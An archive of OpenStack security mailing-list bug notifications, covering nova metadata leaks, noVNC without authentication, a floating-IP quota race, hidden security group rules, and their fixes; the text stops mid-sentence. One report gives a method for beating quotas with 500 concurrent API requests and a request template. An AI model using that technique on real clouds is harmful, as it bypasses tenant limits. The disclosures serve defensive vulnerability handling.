From 1841933 at bugs.launchpad.net Tue Feb 4 12:59:32 2020
From: 1841933 at bugs.launchpad.net (OpenStack Infra)
Date: Tue, 04 Feb 2020 12:59:32 -0000
Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data
References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com>
Message-ID: <158082117212.26030.6666281751380080623.malone@soybean.canonical.com>

Reviewed: https://review.opendev.org/679247
Committed: https://git.openstack.org/cgit/openstack/nova/commit/?id=31773715687326c92d4ad46ebb32b14645bbc614
Submitter: Zuul
Branch: master

commit 31773715687326c92d4ad46ebb32b14645bbc614
Author: Kobi Samoray
Date: Tue Aug 27 13:49:05 2019 +0300

    Avoid fetching metadata when no subnets found

    The metadata service uses the provider id to identify the requesting
    instance. However, when the provider query doesn't find any networks,
    the request should fail. The same goes for the case where multiple
    ports are found.

    Closes-Bug: #1841933
    Change-Id: I8ce3703ca86a3a0769edd42a790d82796d1071d7

** Changed in: nova
   Status: In Progress => Fix Released

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1841933

Title:
  Fetching metadata via LB may result with wrong instance data

Status in OpenStack Compute (nova):
  Fix Released
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  While querying metadata from an instance via a loadbalancer, the
  metadata service relies on X-Metadata-Provider to identify the
  correct instance by querying Neutron for subnets which are attached
  to the loadbalancer. The subnet result is then used to identify the
  instance by querying for ports which are attached to those subnets.

  Yet, when the first query result is empty due to deletion, a bug or
  any other reason on the Neutron side, this may cause a security
  vulnerability, as Neutron will retrieve ports of _any_ instance
  which has the same IP address as the instance being queried. That
  could compromise key pairs and other sensitive data.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions

From 1668410 at bugs.launchpad.net Fri Feb 7 19:10:22 2020
From: 1668410 at bugs.launchpad.net (Brian Haley)
Date: Fri, 07 Feb 2020 19:10:22 -0000
Subject: [Openstack-security] [Bug 1668410] Re: [SRU] Infinite loop trying to delete deleted HA router
References: <20170227213540.6394.32961.malonedeb@wampee.canonical.com>
Message-ID: <158110262705.9041.2439816882091696799.launchpad@chaenomeles.canonical.com>

** Changed in: neutron
   Status: In Progress => Fix Released

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1668410

Title:
  [SRU] Infinite loop trying to delete deleted HA router

Status in Ubuntu Cloud Archive:
  Invalid
Status in Ubuntu Cloud Archive mitaka series:
  Fix Released
Status in neutron:
  Fix Released
Status in OpenStack Security Advisory:
  Won't Fix
Status in neutron package in Ubuntu:
  Invalid
Status in neutron source package in Xenial:
  Fix Released

Bug description:
  [Description]
  When deleting a router the logfile is filled up.
  See full log - http://paste.ubuntu.com/25429257/

  I can see the error 'Error while deleting router
  c0dab368-5ac8-4996-88c9-f5d345a774a6' occurred 3343386 times from
  _safe_router_removed() [1]:

  $ grep -r 'Error while deleting router c0dab368-5ac8-4996-88c9-f5d345a774a6' |wc -l
  3343386

  This _safe_router_removed() is invoked at L488 [2]; if
  _safe_router_removed() goes wrong it returns False, and then
  self._resync_router(update) [3] makes _safe_router_removed() run
  again and again. That is why we saw so many 'Error while deleting
  router XXXXX' errors.

  [1] https://github.com/openstack/neutron/blob/mitaka-eol/neutron/agent/l3/agent.py#L361
  [2] https://github.com/openstack/neutron/blob/mitaka-eol/neutron/agent/l3/agent.py#L488
  [3] https://github.com/openstack/neutron/blob/mitaka-eol/neutron/agent/l3/agent.py#L457

  [Test Case]
  This happens because of a race condition between the neutron server
  and the L3 agent: after the neutron server deletes the HA
  interfaces, the L3 agent may sync an HA router without its HA
  interface info (it just needs to trigger L708 [1] after the HA
  interfaces are deleted and before the HA router is deleted). If we
  delete the HA router at this time, this problem will happen. So the
  test case we designed is as below:

  1, First update the fixed package, and restart neutron-server by
  'sudo service neutron-server restart'

  2, Create an HA router
  neutron router-create harouter --ha=True

  3, Delete the ports associated with the HA router before deleting it
  neutron router-port-list harouter |grep 'HA port' |awk '{print $2}' |xargs -l neutron port-delete
  neutron router-port-list harouter

  4, Update the HA router to trigger the l3-agent to update the router
  info without ha_port into self.router_info
  neutron router-update harouter --description=test

  5, Delete the HA router this time
  neutron router-delete harouter

  [1] https://github.com/openstack/neutron/blob/mitaka-eol/neutron/db/l3_hamode_db.py#L708

  [Regression Potential]
  The fixed patch [1] for neutron-server will no longer return an HA
  router which is missing ha_ports, so L488 [2] will no longer have a
  chance to call _safe_router_removed() for an HA router; the problem
  is therefore fundamentally fixed by this patch and there is no
  regression potential.

  Besides, this fixed patch is in the mitaka-eol branch now, and the
  neutron-server mitaka package is based on neutron-8.4.0, so we need
  to backport it to xenial and mitaka.

  $ git tag --contains 8c77ee6b20dd38cc0246e854711cb91cffe3a069
  mitaka-eol

  [1] https://review.openstack.org/#/c/440799/2/neutron/db/l3_hamode_db.py
  [2] https://github.com/openstack/neutron/blob/mitaka-eol/neutron/agent/l3/agent.py#L488

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-archive/+bug/1668410/+subscriptions

From 1666959 at bugs.launchpad.net Fri Feb 7 19:18:55 2020
From: 1666959 at bugs.launchpad.net (Brian Haley)
Date: Fri, 07 Feb 2020 19:18:55 -0000
Subject: [Openstack-security] [Bug 1666959] Re: ha_vrrp_auth_type defaults to PASS which is insecure
References: <20170222154900.3995.72774.malonedeb@chaenomeles.canonical.com>
Message-ID: <158110313975.19098.6703802812206563899.launchpad@gac.canonical.com>

** Changed in: neutron
   Status: New => Won't Fix

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1666959

Title:
  ha_vrrp_auth_type defaults to PASS which is insecure

Status in neutron:
  Won't Fix
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  With l3_ha enabled, ha_vrrp_auth_type defaults to PASS authentication:
  https://github.com/openstack/neutron/blob/b90ec94dc3f83f63bdb505ace1e4c272435c494b/neutron/conf/agent/l3/ha.py#L28
  which, according to
  http://louwrentius.com/configuring-attacking-and-securing-vrrp-on-linux.html,
  is totally insecure because the VRRP password is transmitted in the
  clear.

  I'm not sure if this is currently a serious issue, since if the VRRP
  network is untrusted, maybe there are already bigger problems. But I
  thought it was worth reporting, at least.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1666959/+subscriptions

From 1447679 at bugs.launchpad.net Fri Feb 14 16:35:06 2020
From: 1447679 at bugs.launchpad.net (OpenStack Infra)
Date: Fri, 14 Feb 2020 16:35:06 -0000
Subject: [Openstack-security] [Bug 1447679] Related fix merged to nova-specs (master)
References: <20150423154044.13260.70404.malonedeb@chaenomeles.canonical.com>
Message-ID: <158169810643.30187.3066322959554537393.malone@wampee.canonical.com>

Reviewed: https://review.opendev.org/623120
Committed: https://git.openstack.org/cgit/openstack/nova-specs/commit/?id=33a13a1aabee9d89a88c3b7e3e18244b2bd6a0c1
Submitter: Zuul
Branch: master

commit 33a13a1aabee9d89a88c3b7e3e18244b2bd6a0c1
Author: pandatt
Date: Thu Dec 6 10:31:58 2018 +0800

    Proposal for a safer remote console with password authentication

    The feature aims at providing a safer remote console with password
    authentication. End users can set a console password for their
    instances. Any user trying to access the password-encrypted console
    of an instance will get a locked window from the web console
    prompting for ``password`` input, and this provides almost the same
    experience as using VNC clients (e.g. vncviewer) to access vnc
    servers that require password authentication.

    Blueprint: nova-support-webvnc-with-password-anthentication
    Related-bug: #1447679
    Change-Id: I8416ceb88b9e9e6498a81c678944bc5d96700fc3

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1447679

Title:
  service No-VNC (port 6080) doesn't require authentication

Status in OpenStack Compute (nova):
  Confirmed
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Reported via private E-mail from Anass ANNOUR:

  I found that the service No-VNC (port 6080) doesn't require
  authentication: if you know the URL (ex:
  http://192.168.198.164:6080/vnc_auto.html?token=3640a3c8-ad10-45da-a523-18d3793ef8ec)
  you can access the machine from any other computer without any
  authentication before the token expires.
  (Or at the same time, while the user is still using the console.)

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1447679/+subscriptions

From fungi at yuggoth.org Mon Feb 17 20:36:09 2020
From: fungi at yuggoth.org (Jeremy Stanley)
Date: Mon, 17 Feb 2020 20:36:09 -0000
Subject: [Openstack-security] [Bug 1862050] Re: Race condition while allocating floating IPs
References: <158092560419.18863.6467748917645068435.malonedeb@gac.canonical.com>
Message-ID: <158197176924.29153.8477014513526065749.malone@chaenomeles.canonical.com>

It seems like we've got reasonable consensus that this is expected
behavior, and we have public documentation (at least in the Security
Guide as linked above, but likely also elsewhere) indicating that
OpenStack API servers on the whole do not make any attempt to mitigate
excessively rapid calls to expensive methods and so should be
protected by a separate filtering or throttling mechanism if they're
deployed in an environment where they're at risk of being overloaded.

I'll switch this public, treating it as a class C1 report. If you or
someone else feels this scenario should be covered by a CVE then feel
free to request one from MITRE or another CNA, but please add it in a
follow-up comment on this bug if you do, so that we won't end up with
multiple CVE assignments floating around for the same scenario.
Thanks!

** Description changed:

- This issue is being treated as a potential security risk under embargo.
- Please do not make any public mention of embargoed (private) security
- vulnerabilities before their coordinated publication by the OpenStack
- Vulnerability Management Team in the form of an official OpenStack
- Security Advisory. This includes discussion of the bug or associated
- fixes in public forums such as mailing lists, code review systems and
- bug trackers. Please also avoid private disclosure to other individuals
- not already approved for access to this information, and provide this
- same reminder to those who are made aware of the issue prior to
- publication. All discussion should remain confined to this private bug
- report, and any proposed fixes should be added to the bug as
- attachments.
-
 I work as a penetration tester. In one of our recent projects our
 team encountered a problem in OpenStack, and we are not sure whether
 to consider this an OpenStack security vulnerability. Hope you could
 clarify things for us.

 We were testing race condition vulnerabilities on resources that have
 a limit per project, for example the number of floating IPs. The idea
 is to make the backend server receive a lot of identical requests at
 the same moment; because the server has to process all of them
 simultaneously, we could get a situation where the limits are not
 checked properly.

 Sending 500 requests (each in an individual thread) directly to the
 Neutron API for allocating floating IPs resulted in exceeding the IP
 limit by 4 times.

 Request example:

 POST /v2.0/floatingips HTTP/1.1
 Host: ...
 X-Auth-Token: ...
 Content-Type: application/json
 Content-Length: 103

 {
     "floatingip": {
         "floating_network_id": "..."
     }
 }

 Is it a known OpenStack behavior or is it more like a hardware
 problem?

** Information type changed from Private Security to Public

** Changed in: ossa
   Status: Incomplete => Won't Fix

** Tags added: security

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1862050

Title:
  Race condition while allocating floating IPs

Status in neutron:
  New
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  I work as a penetration tester. In one of our recent projects our
  team encountered a problem in OpenStack, and we are not sure whether
  to consider this an OpenStack security vulnerability. Hope you could
  clarify things for us.

  We were testing race condition vulnerabilities on resources that
  have a limit per project, for example the number of floating IPs.
  The idea is to make the backend server receive a lot of identical
  requests at the same moment; because the server has to process all
  of them simultaneously, we could get a situation where the limits
  are not checked properly.

  Sending 500 requests (each in an individual thread) directly to the
  Neutron API for allocating floating IPs resulted in exceeding the IP
  limit by 4 times.

  Request example:

  POST /v2.0/floatingips HTTP/1.1
  Host: ...
  X-Auth-Token: ...
  Content-Type: application/json
  Content-Length: 103

  {
      "floatingip": {
          "floating_network_id": "..."
      }
  }

  Is it a known OpenStack behavior or is it more like a hardware
  problem?

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1862050/+subscriptions

From 1824248 at bugs.launchpad.net Tue Feb 18 04:58:34 2020
From: 1824248 at bugs.launchpad.net (Sam Morrison)
Date: Tue, 18 Feb 2020 04:58:34 -0000
Subject: [Openstack-security] [Bug 1824248] Re: Security Group filtering hides rules from user
References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com>
Message-ID: <158200191491.31274.7179702981822222453.malone@wampee.canonical.com>

Just a heads up that this causes a huge performance regression, see
lp:1863201

--
You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1824248

Title:
  Security Group filtering hides rules from user

Status in neutron:
  Fix Released
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Manage Rules part of the GUI hides the rules currently visible in
  the Launch Instance modal window. It allows a malicious admin to add
  backdoor access rules that might be later added to VMs without the
  knowledge of owner of those VMs.
When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Feb 18 06:31:39 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 18 Feb 2020 06:31:39 -0000 Subject: [Openstack-security] [Bug 1824248] Fix merged to neutron (stable/rocky) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158200749924.25068.4158280089578920577.malone@gac.canonical.com> Reviewed: https://review.opendev.org/688717 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=993a344559f293a225fe5dd59525e580249c652f Submitter: Zuul Branch: stable/rocky commit 993a344559f293a225fe5dd59525e580249c652f Author: Slawek Kaplonski Date: Thu Sep 12 22:02:52 2019 +0200 List SG rules which belongs to tenant's SG In case when user's security group contains rules created e.g. by admin, and such rules has got admin's tenant as tenant_id, owner of security group should be able to see those rules. Some time ago this was addressed for request: GET /v2.0/security-groups/ But it is also required to behave in same way for GET /v2.0/security-group-rules So this patch fixes this behaviour for listing of security group rules. To achieve that this patch also adds new policy rule: ADMIN_OWNER_OR_SG_OWNER which is similar to already existing ADMIN_OWNER_OR_NETWORK_OWNER used e.g. for listing or creating ports. 
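To make the semantics concrete, the new rule roughly corresponds to the
following predicate. This is an illustrative Python sketch only, not
the actual oslo.policy expression shipped in neutron (the helper name
and argument shapes are assumptions):

    # Hypothetical illustration of ADMIN_OWNER_OR_SG_OWNER: a security
    # group rule is listable by admins, by the rule's owner, or by the
    # owner of the security group the rule belongs to.
    def may_list_sg_rule(context, rule, parent_sg):
        return (context.is_admin
                or rule['tenant_id'] == context.tenant_id
                or parent_sg['tenant_id'] == context.tenant_id)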
Conflicts: neutron/conf/policies/security_group.py Change-Id: I09114712582d2d38d14cf1683b87a8ce3a8e8c3c Closes-Bug: #1824248 (cherry picked from commit b898d2e3c08b50e576ee849fbe8614c66f360c62) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Feb 18 11:18:44 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 18 Feb 2020 11:18:44 -0000 Subject: [Openstack-security] [Bug 1824248] Fix included in openstack/neutron 15.0.2 References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158202472461.29423.1701781906471345390.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/neutron 15.0.2 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Feb 18 14:11:27 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 18 Feb 2020 14:11:27 -0000 Subject: [Openstack-security] [Bug 1824248] Fix included in openstack/neutron 14.1.0 References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158203508793.30257.9718270552998979351.malone@wampee.canonical.com> This issue was fixed in the openstack/neutron 14.1.0 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. 
When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Wed Feb 19 03:36:05 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 19 Feb 2020 03:36:05 -0000 Subject: [Openstack-security] [Bug 1824248] Fix merged to neutron (stable/queens) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158208336600.28723.16444215331086954227.malone@chaenomeles.canonical.com> Reviewed: https://review.opendev.org/688719 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=e00ebee05318edbd18f49df0fd34697d0e1417ed Submitter: Zuul Branch: stable/queens commit e00ebee05318edbd18f49df0fd34697d0e1417ed Author: Slawek Kaplonski Date: Thu Sep 12 22:02:52 2019 +0200 List SG rules which belongs to tenant's SG In case when user's security group contains rules created e.g. by admin, and such rules has got admin's tenant as tenant_id, owner of security group should be able to see those rules. Some time ago this was addressed for request: GET /v2.0/security-groups/ But it is also required to behave in same way for GET /v2.0/security-group-rules So this patch fixes this behaviour for listing of security group rules. To achieve that this patch also adds new policy rule: ADMIN_OWNER_OR_SG_OWNER which is similar to already existing ADMIN_OWNER_OR_NETWORK_OWNER used e.g. for listing or creating ports. 
Conflicts: etc/policy.json neutron/policy.py Change-Id: I09114712582d2d38d14cf1683b87a8ce3a8e8c3c Closes-Bug: #1824248 (cherry picked from commit b898d2e3c08b50e576ee849fbe8614c66f360c62) (cherry picked from commit 36d1086569627af5dafd734333a7ebc4bc060d77) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Fri Feb 21 16:41:59 2020 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 21 Feb 2020 16:41:59 -0000 Subject: [Openstack-security] [Bug 1824248] Fix included in openstack/neutron 16.0.0.0b1 References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <158230332010.14972.17063049099665924256.malone@soybean.canonical.com> This issue was fixed in the openstack/neutron 16.0.0.0b1 development milestone. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1819957 at bugs.launchpad.net Mon Feb 24 17:11:03 2020 From: 1819957 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 24 Feb 2020 17:11:03 -0000 Subject: [Openstack-security] [Bug 1819957] Re: Caching with stale data when a server disconnects due to network partition and reconnects References: <155250258380.27992.5839797432076968036.malonedeb@wampee.canonical.com> Message-ID: <158256426338.24857.12969621347412596997.malone@gac.canonical.com> Reviewed: https://review.opendev.org/704508 Committed: https://git.openstack.org/cgit/openstack/oslo.cache/commit/?id=c31dd1aaac0a1dd8ca3f77b6da911ae85de6dc7a Submitter: Zuul Branch: stable/queens commit c31dd1aaac0a1dd8ca3f77b6da911ae85de6dc7a Author: Morgan Fainberg Date: Fri Mar 22 12:35:16 2019 -0700 Pass `flush_on_reconnect` to memcache pooled backend If a memcache server disappears and then reconnects when multiple memcache servers are used (specific to the python-memcached based backends) it is 